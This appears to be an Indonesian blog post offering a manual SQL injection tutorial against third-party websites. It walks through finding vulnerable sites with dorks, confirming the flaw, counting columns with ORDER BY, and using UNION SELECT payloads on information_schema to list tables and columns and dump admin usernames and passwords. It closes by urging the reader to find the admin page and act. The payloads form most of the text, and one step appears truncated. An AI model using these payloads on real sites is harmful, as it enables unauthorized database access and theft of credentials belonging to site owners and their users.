SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Untuk Tutorialnya, Mari kita bahas..
1. Cari Situs yang Vuln cari di Google/Bingo, atau di SQLi Scanner Online.
2. Pilih Dorknya
DORK DISINI (klik kanan - Open New Link Tab)
3. Untuk yang manual (Google/Bingo) cek situs nya dengan cara :
Contoh : http://target.com/detail.php?id=1' <<< <- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 (Cek dengan cara menambahkan tanda petik ' di belakang angka id nya) jika muncul tulisan error berarti Situsnya Vuln, kalo tidak muncul berarti situsnya tidak Vuln atau sudah di Patch
Yang menggunakan SQLi Scanner Online sudah disediakan Situs yang Vulnnya..
4. Lalu kita coba tambahkan order by 1-- sampai titik menuju error
Contoh:
http://target.com/detail.php?id=1 order by 1-- Tidak Error
http://target.com/detail.php?id=1 order by 2-- Tidak Error
http://target.com/detail.php?id=1 order by 3-- Tidak Error
http://target.com/detail.php?id=1 order by 4-- Tidak Error
http://target.com/detail.php?id=1 order by 5-- Error
5. Nah, yang kita ambil bagian 4nya aja (yang error tidak usah)
hapus order by 5--, lalu ubah dengan:
6. Pasti akan keluar angka, misalkan yang keluar angka 3 yaaa kita coba cek versionnya dengan cara hapus angka 3 ubah dengan @@version
Contoh:
http://target.com/detail.php?id=-1 union all select 1,2,@@version,4-- 7. Jika keluar versi 5.0.1 comunity log atau ada angka 5nya berarti lanjutkan, jika yang keluar versi 4 tinggalkan cari yang lain !!!.. 8. Sekarang coba ganti @@version menjadi group_concat(table_name) dan setelah union all select 1,2,3,4 tambahkan from information_schema.tables where table name_schema=database()--
Contoh:
http://target.com/detail.php?id=-1 union all select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
9. Pasti akan keluar beberapa table yang mungkin berisi table User, Admin, Member, dan lain lain.
Contoh kita ambil table Admin dan kita hex textnya :
- Buka Text Hex
- Dibagian String masukkan text yang ingin di Hex
- Lalu klik Convert
- Copy hasil Hex
Jika sudah maka bagian group_concat(table_name) dan from information_schema.tables where table_schema=database()--
diubah menjadi:
- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database()-- = table_name=0x(tambahkan/paste kata yang di hex tadi) = table_name=0x41646d696e--
Contoh:
http://target.com/detail.php?id=-1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x41646d696e-- 10. Setelah itu akan keluar beberapa column tentang username, email, password, noid, dan lain lain.
Dibagian (column_name) diubah dengan (username,0x3a,password)
Seperti ini : group_concat(username,0x3a,password)
Lalu hapus information_schema.columns where table_name=0x41646d696e-- ubah menjadi nama Column yang di Hex tadi yaitu Admin
Contoh:
http://target.com/detail.php?id=-1 union all select 1,2,group_concat(username,0x3a,password),4 from Admin-- 11. Akan keluar Username dan Password Admin
12. Sekarang cari Page Adminnya
13. Saatnya berkaryaa..
Nah itu Teorinya... kalo Prakteknya bisa liat di Video dari Youtube ini..
0 komentar:
Posting Komentar